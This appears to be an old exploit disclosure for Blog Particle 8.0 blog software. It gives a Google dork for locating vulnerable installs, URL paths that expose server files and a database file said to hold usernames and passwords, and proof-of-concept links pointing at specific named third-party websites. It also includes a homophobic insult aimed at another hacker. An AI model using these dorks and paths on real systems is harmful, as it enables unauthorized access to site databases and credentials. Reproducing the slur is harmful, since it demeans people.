Blog Particle version 8.0 suffers from directory traversal and database credential disclosure vulnerabilities.
ad6b0db6c1a95f7b9efb0e518449c589db7a90eead3d7a8104f2624513e5bb29
*********/////// Blog Particle 8.0 Directory Traversal,Database credential \\\\\\\\*****************
by: e.wiZz!Site: madspot.org
Info: cybernetic is Gay Hacker ah ah ah ah. You are shame for .hr
In the wild.....
***************************************
Vendor: blogparticle.comDork: "powered by BP Blog 8.0"Download: http://blog.betaparticle.com/uploads/blog_8.0.zip
****************DIRECTORY TRAVERSAL*********you cant list v. directories,but you can files:
http://somewhereinthewild.com/fckeditor/editor/filemanager/browser/default/frmupload.htmlhttp://somewhereinthewild.com/_mmServerScripts/adojavas.incPoC:
http://keune.org/blog/_mmServerScripts/adojavas.inchttp://www.markrushworth.com/_mmServerScripts/adojavas.inc
***************DATABASE COMPLETE INFO VULNERABILITY***************
http://somewhereinwild.com/Connections/blog.sqlYou have database username,password,and other blog info
_________________________________________________________________
Connect to the next generation of MSN Messenger
http://imagine-msn.com/messenger/launch80/default.aspx?locale=en-us&source=wlmailtagline